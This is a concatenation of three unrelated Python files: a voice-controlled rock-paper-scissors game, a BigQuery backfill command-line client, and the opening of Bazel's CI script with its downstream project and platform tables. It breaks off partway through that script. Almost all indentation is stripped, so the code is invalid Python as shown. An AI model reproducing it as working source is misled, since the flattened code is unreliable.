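# Capture one utterance from the default microphone and transcribe it with
# speech_recognition's Google Web Speech backend (recognize_google); returns the
# lower-cased text, or the string "None" when recognition fails.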
def record():
global userchat
userchat['text'] = "Listening..."
r = sr.Recognizer()
r.dynamic_energy_threshold = False
r.energy_threshold = 4000
with sr.Microphone() as source:
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
said = ""
try:
said = r.recognize_google(audio)
print(f"\nUser said: {said}")
except Exception as e:
print(e)
speak("I think it is invalid move...")
return "None"
return said.lower()
moves = ['rock', 'paper', 'scissor']
class RockPaperScissor:
def __init__(self):
self.playerScore = 0
self.botScore = 0
self.total_moves = 0
self.intro()
def intro(self):
speak("Welcome to the Rock Paper Scissor Game. To STOP the Match, say STOP or Cancel. Let's Play.")
def nextMove(self, move):
global userchat, botchat, totalLabel, botMoveLBL
userchat['text'] = move.upper()
botMove = randint(0,2)
playerMove = moves.index(move)
botchat['text'] = moves[botMove].upper()
self.total_moves += 1
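        # Score the round: indices follow `moves` (0 = rock, 1 = paper, 2 = scissor).
        # A tie adds a point to both sides; otherwise the winner is whoever played
        # the beating move (paper > rock, scissor > paper, rock > scissor).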
if botMove==playerMove:
self.botScore += 1
self.playerScore += 1
elif botMove==0:
if playerMove==1:
self.playerScore += 1
else:
self.botScore += 1
elif botMove==1:
if playerMove==2:
self.playerScore += 1
else:
self.botScore += 1
else:
if playerMove==0:
self.playerScore += 1
else:
self.botScore += 1
totalLabel['text'] = str(self.botScore)+' | '+str(self.playerScore)
if botMove==0: botMoveLBL['image'] = rockImg
if botMove==1: botMoveLBL['image'] = paperImg
if botMove==2: botMoveLBL['image'] = scissorImg
speak('I choose: ' + str(moves[botMove]))
return botMove+1
def whoWon(self):
result = ""
if self.playerScore == self.botScore:
result = "The match is draw !\n"
elif self.playerScore > self.botScore:
result = "You won the match Sir! Well Done !\n"
else:
result = "You lose the match Sir! Haha!\n"
for el in root.winfo_children():
el.destroy()
if 'won' in result:
Label(root, image=winImg).pack(pady=30)
elif 'lose' in result:
Label(root, image=loseImg).pack(pady=30)
else:
Label(root, image=drawImg).pack(pady=30)
result += "You have won " +str(self.playerScore)+"/"+str(self.total_moves)+" matches."
Label(root, text='Score', font=('Arial Bold', 50), fg='#FE8A28', bg='white').pack()
Label(root, text=str(self.playerScore)+' / '+str(self.total_moves), font=('Arial Bold', 40), fg='#292D3E', bg='white').pack()
speak(result)
time.sleep(1)
closeWindow()
return
rockImg, paperImg, scissorImg, userchat, botchat, totalLabel, botMoveLBL, userMoveLBL, winImg, loseImg, drawImg = None, None, None, None, None, None, None, None, None, None, None
def playRock():
rp = RockPaperScissor()
while True:
global botMoveLBL, userMoveLBL
move = record()
if isContain(move, ["don't", "cancel", "stop"]):
rp.whoWon()
break
else:
img = None
if 'rock' in move:
userMoveLBL['image'] = rockImg
img = rp.nextMove('rock')
elif 'paper' in move:
userMoveLBL['image'] = paperImg
img = rp.nextMove('paper')
elif 'scissor' in move or 'caesar' in move:
userMoveLBL['image'] = scissorImg
img = rp.nextMove('scissor')
def rockPaperScissorWindow():
global root, rockImg, paperImg, scissorImg, userchat, botchat, totalLabel, botMoveLBL, userMoveLBL, winImg, loseImg, drawImg
root = Tk()
root.title('Rock Paper Scissor')
# root.resizable(0,0)
# root.attributes('-toolwindow', True)
w_width, w_height = 400, 650
s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
root.configure(bg='white')
rockImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/1.jpg'))
paperImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/2.jpg'))
scissorImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/3.jpg'))
grayImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/grayQuestion.png'))
orangeImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/orangeQuestion.jpg'))
winImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/win.jpg'))
loseImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/lose.jpg'))
drawImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/draw.jpg'))
toplbl = Label(root, text='Total Score', font=('Arial Bold', 20), fg='#FE8A28', bg='white').pack()
totalLabel = Label(root, text='0 | 0', font=('Arial Bold', 15), fg='#1F1F1F', bg='white')
totalLabel.pack()
#bottom image
img = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/rockPaperScissor.jpg'))
downLbl = Label(root, image=img)
downLbl.pack(side=BOTTOM)
#user response
userchat = Label(root, text='Listening...', bg='#FE8A28', fg='white', font=('Arial Bold',13))
userchat.place(x=300, y=120)
userMoveLBL = Label(root, image=orangeImg)
userMoveLBL.place(x=260, y=150)
#bot response
botchat = Label(root, text='Waiting...', bg='#EAEAEA', fg='#494949', font=('Arial Bold',13))
botchat.place(x=12, y=120)
botMoveLBL = Label(root, image=grayImg)
botMoveLBL.place(x=12, y=150)
Thread(target=playRock).start()
root.iconbitmap("extrafiles/images/game.ico")
root.mainloop()
def isContain(text, lst):
for word in lst:
if word in text:
return True
return False
def play(gameName):
speak('')
if isContain(gameName, ['dice','die']):
playsound.playsound('extrafiles/audios/dice.mp3')
result = "You got " + str(randint(1,6))
return result
elif isContain(gameName, ['coin']):
playsound.playsound('extrafiles/audios/coin.mp3')
p = randint(-10,10)
if p>0: return "You got Head"
else: return "You got Tail"
elif isContain(gameName, ['rock','paper','scissor','first']):
rockPaperScissorWindow()
return
else:
print("Game Not Available")
def showGames():
return "1. Rock Paper Scissor\n2. Online Games"
|
bq_client.py
|
import argparse
import sys
import logging
from utils.bigquery_utils import BigQueryUtils
from utils.common_utils import *
from gcputils.utils.bigquery_utils import *
from gcputils.utils.common_utils import *
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
class BigQueryClient:
def __init__(self, args):
"""
:param args: argparse Namespace instance which contains list of command line args
"""
self.bq_utils = BigQueryUtils(project=args.project)
self.template_fields = self.read_from_file(args.template_file) if args.template_file else args.template
self.start_date = args.start_date if args.start_date else datetime.now()
self.end_date = args.end_date if args.end_date else self.start_date
self.date_diff = self.end_date - self.start_date
if args.service_account_path:
self.service = self.bq_utils.get_connection(service_account_file_path=args.service_account_path)
else:
self.service = self.bq_utils.get_connection()
def read_from_file(self, file_path):
"""
:param file_path: full absolute path of the file that need to be read
:return: return string content of the file
"""
        with open(file_path) as f:
            return f.read()
def controller(self, args):
"""
:param args: Namespace object which contains list of arguments
:return:
"""
start_date = self.start_date
end_date = self.end_date
dataset_id = None
table_id = None
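        # Backfill loop: run the (templated) query once per day from start_date
        # through end_date inclusive, substituting each execution date into the
        # query string and the destination table id.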
while end_date >= start_date: # backfilling
logging.info("Executing query for {}".format(datetime.strftime(start_date, "%Y-%d-%m")))
if args.query or args.query_file:
query_string = apply_template_values(args.query if args.query else self.read_from_file(args.query_file), execution_date=start_date)
if args.destination_table and not args.dml:
try:
assert len(args.destination_table.split(':')) <= 1
assert len(args.destination_table.split('.')) == 2
except Exception as e:
                        raise ValueError("destination table is not in the expected format <datasetid>.<tableid>")
dataset_id, table_id = args.destination_table.split('.')
table_id = apply_template_values(table_id, self.template_fields, execution_date=start_date)
logging.info("----------------------------")
logging.info("table name - %s", table_id)
logging.info("----------------------------")
try:
logging.info("bq job initiated for date - {}".format(datetime.strftime(start_date, "%Y-%m-%d")))
self.bq_utils.query_to_table(self.service,
query=query_string,
dest_dataset_id=dataset_id,
dest_table_id=table_id,
flattern_results=args.flattern_results,
write_disposition=args.write_desposition,
use_standard_sql=bool(args.ssql),
is_dml=bool(args.dml))
logging.info(
"Successfully completed for date - {}".format(datetime.strftime(start_date, "%Y-%m-%d ")))
except Exception as e:
logging.info("Something went wrong for date {}".format(datetime.strftime(start_date, "%Y-%m-%d")))
logging.info(e)
else:
logging.info("Please provide destination details")
start_date = start_date + timedelta(1)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-q", "--query", dest="query", help="provide valid bigquery sql")
parser.add_argument("-f", "--no-flattern", dest="flattern_results", action="store_true", default=True, help="Flattern results")
parser.add_argument("-p", "--project_id", default=None, dest="project", help="provide valid project id")
parser.add_argument("-ssql", "--standard-sql", dest="ssql", default=False, action="store_true", help="Mention if using Standard sql")
parser.add_argument("-dml", "--dml-statement", dest="dml", default=False, action="store_true",
help="Mention if using DML statements in your query")
parser.add_argument("-d", "--destination-table", dest="destination_table", help="<projectname>:<datasetid>.<tableid> provide valid destination project-id")
parser.add_argument("-w", "--write-desposition", default='WRITE_EMPTY', dest="write_desposition", help="Write disposition value")
parser.add_argument("-qf", "--query-file", dest="query_file", help="provide bigquery sql filepath")
parser.add_argument("-t", "--template", default={}, dest="template", help="provide template values")
parser.add_argument("-tf", "--template-file", dest="template_file", help="provide template file path")
parser.add_argument("-s", "--start-date", dest="start_date", help="Provide valid startdate (YYYY-MM-DD)", type=valid_date)
parser.add_argument("-e", "--end-date", dest="end_date", help="Provide valid end date (YYYY-MM-DD)", type=valid_date)
parser.add_argument("-sf", "--service-account-file-path", dest="service_account_path", help="provide valid path of service account json file")
args = parser.parse_args()
if len(sys.argv) <= 1:
parser.print_help()
exit()
bq_client = BigQueryClient(args)
bq_client.controller(args)
# t = Thread(target=bq_client.controller, kwargs={'args':args})
# t.start()
# timeout = 30.0
#
# while t.isAlive():
# time.sleep(0.1)
# timeout -= 0.1
# if timeout == 0.0:
# print 'Please wait...'
# timeout = 30.0
if __name__ == "__main__":
main()
|
bazelci.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import base64
import codecs
import datetime
from glob import glob
import hashlib
import json
import multiprocessing
import os
import os.path
import random
import re
import requests
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import time
import urllib.error
import urllib.request
import uuid
import yaml
# Initialize the random number generator.
random.seed()
BUILDKITE_ORG = os.environ["BUILDKITE_ORGANIZATION_SLUG"]
THIS_IS_PRODUCTION = BUILDKITE_ORG == "bazel"
THIS_IS_TESTING = BUILDKITE_ORG == "bazel-testing"
THIS_IS_TRUSTED = BUILDKITE_ORG == "bazel-trusted"
THIS_IS_SPARTA = True
CLOUD_PROJECT = "bazel-public" if THIS_IS_TRUSTED else "bazel-untrusted"
GITHUB_BRANCH = {"bazel": "master", "bazel-trusted": "master", "bazel-testing": "testing"}[
BUILDKITE_ORG
]
SCRIPT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/bazelci.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/incompatible_flag_verbose_failures.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/aggregate_incompatible_flags_test_result.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
EMERGENCY_FILE_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/emergency.yml?{}".format(
GITHUB_BRANCH, int(time.time())
)
FLAKY_TESTS_BUCKET = {
"bazel-testing": "gs://bazel-testing-buildkite-stats/flaky-tests-bep/",
"bazel-trusted": "gs://bazel-buildkite-stats/flaky-tests-bep/",
"bazel": "gs://bazel-buildkite-stats/flaky-tests-bep/",
}[BUILDKITE_ORG]
KZIPS_BUCKET = {
"bazel-testing": "gs://bazel-kzips-testing/",
"bazel-trusted": "gs://bazel-kzips/",
"bazel": "gs://bazel-kzips/",
}[BUILDKITE_ORG]
# Projects can opt out of receiving GitHub issues from --notify by adding `"do_not_notify": True` to their respective downstream entry.
DOWNSTREAM_PROJECTS_PRODUCTION = {
"Android Studio Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/android-studio.yml",
"pipeline_slug": "android-studio-plugin",
},
"Android Testing": {
"git_repository": "https://github.com/googlesamples/android-testing.git",
"http_config": "https://raw.githubusercontent.com/googlesamples/android-testing/master/bazelci/buildkite-pipeline.yml",
"pipeline_slug": "android-testing",
"disabled_reason": "https://github.com/android/testing-samples/issues/417",
},
"Bazel": {
"git_repository": "https://github.com/bazelbuild/bazel.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bazel",
},
"Bazel Bench": {
"git_repository": "https://github.com/bazelbuild/bazel-bench.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-bench/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bench",
},
"Bazel Codelabs": {
"git_repository": "https://github.com/bazelbuild/codelabs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/codelabs/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-codelabs",
"disabled_reason": "https://github.com/bazelbuild/codelabs/issues/38",
},
"Bazel Examples": {
"git_repository": "https://github.com/bazelbuild/examples.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/examples/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-bazel-examples",
},
"Bazel Federation": {
"git_repository": "https://github.com/bazelbuild/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
"disabled_reason": "https://github.com/bazelbuild/bazel-federation/issues/126",
},
"Bazel Remote Cache": {
"git_repository": "https://github.com/buchgr/bazel-remote.git",
"http_config": "https://raw.githubusercontent.com/buchgr/bazel-remote/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-remote-cache",
},
"Bazel integration testing": {
"git_repository": "https://github.com/bazelbuild/bazel-integration-testing.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-integration-testing/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-integration-testing",
},
"Bazel skylib": {
"git_repository": "https://github.com/bazelbuild/bazel-skylib.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-skylib/main/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-skylib",
"owned_by_bazel": True,
},
"Bazel toolchains": {
"git_repository": "https://github.com/bazelbuild/bazel-toolchains.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-toolchains/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-toolchains",
},
"Bazel watcher": {
"git_repository": "https://github.com/bazelbuild/bazel-watcher.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-watcher/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-watcher",
},
"Bazelisk": {
"git_repository": "https://github.com/bazelbuild/bazelisk.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazelisk/master/.bazelci/config.yml",
"pipeline_slug": "bazelisk",
},
"Buildfarm": {
"git_repository": "https://github.com/bazelbuild/bazel-buildfarm.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-buildfarm/main/.bazelci/presubmit.yml",
"pipeline_slug": "buildfarm-farmer",
},
"Buildtools": {
"git_repository": "https://github.com/bazelbuild/buildtools.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/buildtools/master/.bazelci/presubmit.yml",
"pipeline_slug": "buildtools",
},
"Cargo-Raze": {
"git_repository": "https://github.com/google/cargo-raze.git",
"http_config": "https://raw.githubusercontent.com/google/cargo-raze/main/.bazelci/presubmit.yml",
"pipeline_slug": "cargo-raze",
},
"CLion Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/clion.yml",
"pipeline_slug": "clion-plugin",
},
"Cartographer": {
"git_repository": "https://github.com/googlecartographer/cartographer.git",
"http_config": "https://raw.githubusercontent.com/googlecartographer/cartographer/master/.bazelci/presubmit.yml",
"pipeline_slug": "cartographer",
},
"Cloud Robotics Core": {
"git_repository": "https://github.com/googlecloudrobotics/core.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/cloud-robotics.yml",
"pipeline_slug": "cloud-robotics-core",
},
"Envoy": {
"git_repository": "https://github.com/envoyproxy/envoy.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/envoy.yml",
"pipeline_slug": "envoy",
},
"FlatBuffers": {
"git_repository": "https://github.com/google/flatbuffers.git",
"http_config": "https://raw.githubusercontent.com/google/flatbuffers/master/.bazelci/presubmit.yml",
"pipeline_slug": "flatbuffers",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Flogger": {
"git_repository": "https://github.com/google/flogger.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/flogger.yml",
"pipeline_slug": "flogger",
},
"Gerrit": {
"git_repository": "https://gerrit.googlesource.com/gerrit.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/gerrit.yml",
"pipeline_slug": "gerrit",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1182",
},
"Google Logging": {
"git_repository": "https://github.com/google/glog.git",
"http_config": "https://raw.githubusercontent.com/google/glog/master/.bazelci/presubmit.yml",
"pipeline_slug": "google-logging",
},
"IntelliJ Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/intellij.yml",
"pipeline_slug": "intellij-plugin",
},
"IntelliJ Plugin Aspect": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/aspect.yml",
"pipeline_slug": "intellij-plugin-aspect",
},
"Kythe": {
"git_repository": "https://github.com/kythe/kythe.git",
"http_config": "https://raw.githubusercontent.com/kythe/kythe/master/.bazelci/presubmit.yml",
"pipeline_slug": "kythe",
},
"Protobuf": {
"git_repository": "https://github.com/google/protobuf.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/protobuf.yml",
"pipeline_slug": "protobuf",
"owned_by_bazel": True,
},
"Stardoc": {
"git_repository": "https://github.com/bazelbuild/stardoc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/stardoc/master/.bazelci/presubmit.yml",
"pipeline_slug": "stardoc",
"owned_by_bazel": True,
},
"Subpar": {
"git_repository": "https://github.com/google/subpar.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/subpar.yml",
"pipeline_slug": "subpar",
"owned_by_bazel": True,
"disabled_reason": "https://github.com/google/subpar/issues/133",
},
"TensorFlow": {
"git_repository": "https://github.com/tensorflow/tensorflow.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/tensorflow.yml",
"pipeline_slug": "tensorflow",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Tulsi": {
"git_repository": "https://github.com/bazelbuild/tulsi.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/tulsi/master/.bazelci/presubmit.yml",
"pipeline_slug": "tulsi-bazel-darwin",
"disabled_reason": "https://github.com/bazelbuild/tulsi/issues/286",
},
"re2": {
"git_repository": "https://github.com/google/re2.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/re2.yml",
"pipeline_slug": "re2",
},
"rules_android": {
"git_repository": "https://github.com/bazelbuild/rules_android.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_android/master/.bazelci/postsubmit.yml",
"pipeline_slug": "rules-android",
"disabled_reason": "https://github.com/bazelbuild/rules_android/issues/15",
},
"rules_appengine": {
"git_repository": "https://github.com/bazelbuild/rules_appengine.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_appengine/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-appengine-appengine",
},
"rules_apple": {
"git_repository": "https://github.com/bazelbuild/rules_apple.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_apple/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-apple-darwin",
},
"rules_cc": {
"git_repository": "https://github.com/bazelbuild/rules_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_cc/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-cc",
"owned_by_bazel": True,
},
"rules_closure": {
"git_repository": "https://github.com/bazelbuild/rules_closure.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_closure/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-closure-closure-compiler",
"owned_by_bazel": True,
},
"rules_docker": {
"git_repository": "https://github.com/bazelbuild/rules_docker.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_docker/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-docker-docker",
},
"rules_dotnet": {
"git_repository": "https://github.com/bazelbuild/rules_dotnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_dotnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-dotnet-edge",
},
"rules_foreign_cc": {
"git_repository": "https://github.com/bazelbuild/rules_foreign_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_foreign_cc/main/.bazelci/config.yaml",
"pipeline_slug": "rules-foreign-cc",
"owned_by_bazel": True,
},
"rules_go": {
"git_repository": "https://github.com/bazelbuild/rules_go.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_go/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-go-golang",
},
"rules_groovy": {
"git_repository": "https://github.com/bazelbuild/rules_groovy.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_groovy/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-groovy",
},
"rules_gwt": {
"git_repository": "https://github.com/bazelbuild/rules_gwt.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_gwt/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-gwt",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1202",
},
"rules_haskell": {
"git_repository": "https://github.com/tweag/rules_haskell.git",
"http_config": "https://raw.githubusercontent.com/tweag/rules_haskell/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-haskell-haskell",
"disabled_reason": "https://github.com/tweag/rules_haskell/issues/1650",
},
"rules_jsonnet": {
"git_repository": "https://github.com/bazelbuild/rules_jsonnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jsonnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jsonnet",
},
"rules_jvm_external": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jvm-external",
"owned_by_bazel": True,
},
"rules_jvm_external - examples": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/examples.yml",
"pipeline_slug": "rules-jvm-external-examples",
"owned_by_bazel": True,
},
"rules_k8s": {
"git_repository": "https://github.com/bazelbuild/rules_k8s.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_k8s/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-k8s-k8s",
"disabled_reason": "https://github.com/bazelbuild/rules_k8s/issues/668",
},
"rules_kotlin": {
"git_repository": "https://github.com/bazelbuild/rules_kotlin.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_kotlin/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-kotlin-kotlin",
},
"rules_nodejs": {
"git_repository": "https://github.com/bazelbuild/rules_nodejs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_nodejs/stable/.bazelci/presubmit.yml",
"pipeline_slug": "rules-nodejs-nodejs",
},
"rules_perl": {
"git_repository": "https://github.com/bazelbuild/rules_perl.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_perl/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-perl",
},
"rules_proto": {
"git_repository": "https://github.com/bazelbuild/rules_proto.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_proto/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-proto",
"owned_by_bazel": True,
},
"rules_python": {
"git_repository": "https://github.com/bazelbuild/rules_python.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_python/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-python-python",
"owned_by_bazel": True,
},
"rules_rust": {
"git_repository": "https://github.com/bazelbuild/rules_rust.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_rust/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-rust-rustlang",
},
"rules_sass": {
"git_repository": "https://github.com/bazelbuild/rules_sass.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_sass/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-sass",
},
"rules_scala": {
"git_repository": "https://github.com/bazelbuild/rules_scala.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_scala/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-scala-scala",
"disabled_reason": "https://github.com/bazelbuild/rules_scala/issues/1224",
},
"rules_swift": {
"git_repository": "https://github.com/bazelbuild/rules_swift.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_swift/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-swift-swift",
"do_not_notify": "https://github.com/bazelbuild/continuous-integration/issues/915",
},
"rules_webtesting": {
"git_repository": "https://github.com/bazelbuild/rules_webtesting.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_webtesting/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-webtesting-saucelabs",
},
"upb": {
"git_repository": "https://github.com/protocolbuffers/upb.git",
"http_config": "https://raw.githubusercontent.com/protocolbuffers/upb/master/.bazelci/presubmit.yml",
"pipeline_slug": "upb",
},
}
DOWNSTREAM_PROJECTS_TESTING = {
"Bazel": DOWNSTREAM_PROJECTS_PRODUCTION["Bazel"],
"Bazelisk": DOWNSTREAM_PROJECTS_PRODUCTION["Bazelisk"],
"Federation": {
"git_repository": "https://github.com/fweikert/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/fweikert/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
},
"rules_docker": DOWNSTREAM_PROJECTS_PRODUCTION["rules_docker"],
"rules_go": DOWNSTREAM_PROJECTS_PRODUCTION["rules_go"],
"rules_groovy": DOWNSTREAM_PROJECTS_PRODUCTION["rules_groovy"],
"rules_kotlin": DOWNSTREAM_PROJECTS_PRODUCTION["rules_kotlin"],
"rules_nodejs": DOWNSTREAM_PROJECTS_PRODUCTION["rules_nodejs"],
"rules_rust": DOWNSTREAM_PROJECTS_PRODUCTION["rules_rust"],
"rules_scala": DOWNSTREAM_PROJECTS_PRODUCTION["rules_scala"],
}
DOWNSTREAM_PROJECTS = {
"bazel-testing": DOWNSTREAM_PROJECTS_TESTING,
"bazel-trusted": {},
"bazel": DOWNSTREAM_PROJECTS_PRODUCTION,
}[BUILDKITE_ORG]
DOCKER_REGISTRY_PREFIX = {
"bazel-testing": "bazel-public/testing",
"bazel-trusted": "bazel-public",
"bazel": "bazel-public",
}[BUILDKITE_ORG]
# A map containing all supported platform names as keys, with the values being
# the platform name in a human-readable format and the buildkite-agent's
# working directory.
PLATFORMS = {
"centos7": {
"name": "CentOS 7 (OpenJDK 8, gcc 4.8.5)",
"emoji-name": ":centos: 7 (OpenJDK 8, gcc 4.8.5)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java8",
"python": "python3.6",
},
"centos7_java11": {
"name": "CentOS 7 (OpenJDK 11, gcc 4.8.5)",
"emoji-name": ":centos: 7 (OpenJDK 11, gcc 4.8.5)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java11",
"python": "python3.6",
},
"centos7_java11_devtoolset10": {
"name": "CentOS 7 (OpenJDK 11, gcc 10.2.1)",
"emoji-name": ":centos: 7 (OpenJDK 11, gcc 10.2.1)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1404", "centos7", "linux"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java11-devtoolset10",
"python": "python3.6",
},
"debian10": {
"name": "Debian 10 Buster (OpenJDK 11, gcc 8.3.0)",
"emoji-name": ":debian: 10 Buster (OpenJDK 11, gcc 8.3.0)",
